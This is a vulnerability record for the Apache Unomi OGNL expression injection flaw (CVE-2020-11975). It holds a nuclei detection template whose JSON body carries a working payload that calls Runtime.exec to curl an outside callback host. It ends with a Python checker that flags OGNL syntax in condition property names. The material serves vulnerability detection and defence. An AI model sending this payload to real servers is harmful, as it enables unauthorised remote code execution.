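Vulnerability information
Vulnerability name: Apache Unomi Expression Language Injection Vulnerability
Vulnerability ID:
Vulnerability type: Code injection
Severity: Critical
Description: Apache Unomi is an open-source customer data platform (CDP) used to manage user data and personalize the user experience. It is widely used in enterprise services, especially in web applications that require highly personalized user interaction. The platform allows conditions to use OGNL scripting, which gives attackers an opportunity to exploit the vulnerability. The technical root cause is that Apache Unomi allows conditions to use OGNL scripting, which makes it possible to call static Java classes from the JDK that can execute code with the permission level of the running Java process. An attacker can exploit this vulnerability to execute arbitrary code, but exploitation requires access to the OGNL scripting feature. The impact is extremely severe because it allows an attacker to execute arbitrary code remotely without authorization, which can lead to data leakage, service disruption or other malicious activity. Because exploitation requires no user interaction and can be automated, the risk level is rated critical.
Vendor: Apache
Product name: Apache Unomi
Source: https://github.com/projectdiscovery/nuclei-templates/blob/25579a21daaba847f878d9c8fa92aaf6db673b76/http%2Fcves%2F2020%2FCVE-2020-11975.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details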
```yaml
id: CVE-2020-11975

info:
  name: Apache Unomi - Expression Language Injection
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, letting attackers execute arbitrary code, exploit requires access to OGNL scripting feature.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 1
  tags: rce,cve,cve2020,apache,ognl,unomi,expression-injection

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"

    headers:
      Content-Type: application/json

    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or
```
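A defender-side check for the request shape used in the template above, as an added example that is not part of the nuclei template or of Apache Unomi: it walks a `/context.json` body and reports every condition `propertyName` that is not a plain dotted property path. The function names, the allowlist pattern and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Assumption: a legitimate propertyName is a dotted identifier path such as
# "properties.gender"; any other value is reported.
PLAIN_PROPERTY = re.compile(r"[A-Za-z_][\w-]*(?:\.[A-Za-z_][\w-]*)*")
# OGNL syntax of the kind the template's payload uses.
OGNL_MARKERS = {
    "static-member": re.compile(r"@[\w.$]+@\w+"),  # @class@member
    "variable": re.compile(r"#\w+"),               # #name
    "call": re.compile(r"\("),                     # method or sub-expression
}

def _walk(node, path):
    """Yield (json_path, propertyName) for every parameterValues object, at any depth."""
    if isinstance(node, dict):
        params = node.get("parameterValues")
        if isinstance(params, dict) and "propertyName" in params:
            yield f"{path}.parameterValues.propertyName", params["propertyName"]
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from _walk(item, f"{path}[{index}]")

def suspicious_property_names(body):
    """Return [(json_path, value, [marker names])] for values that are not plain paths."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return [("$", body[:80], ["unparseable-json"])]
    findings = []
    for path, value in _walk(doc, "$"):
        if isinstance(value, str) and PLAIN_PROPERTY.fullmatch(value):
            continue
        text = value if isinstance(value, str) else json.dumps(value)
        markers = [name for name, rx in OGNL_MARKERS.items() if rx.search(text)]
        findings.append((path, text, markers or ["not-a-plain-path"]))
    return findings

# Constructed sample bodies (not captured traffic); the command is a placeholder.
def _body(property_name):
    return json.dumps({"personalizations": [{"contents": [{"filters": [{"condition": {
        "type": "profilePropertyCondition", "parameterValues": {"propertyName": property_name}}}]}]}]})

BENIGN = _body("properties.gender")
INJECTED = _body('(#r=@java.lang.Runtime@getRuntime()).(#r.exec("PLACEHOLDER"))')
if __name__ == "__main__":
    print(suspicious_property_names(BENIGN), suspicious_property_names(INJECTED))
```

The same walk covers nested conditions, since sub-conditions placed inside another condition's `parameterValues` are visited too.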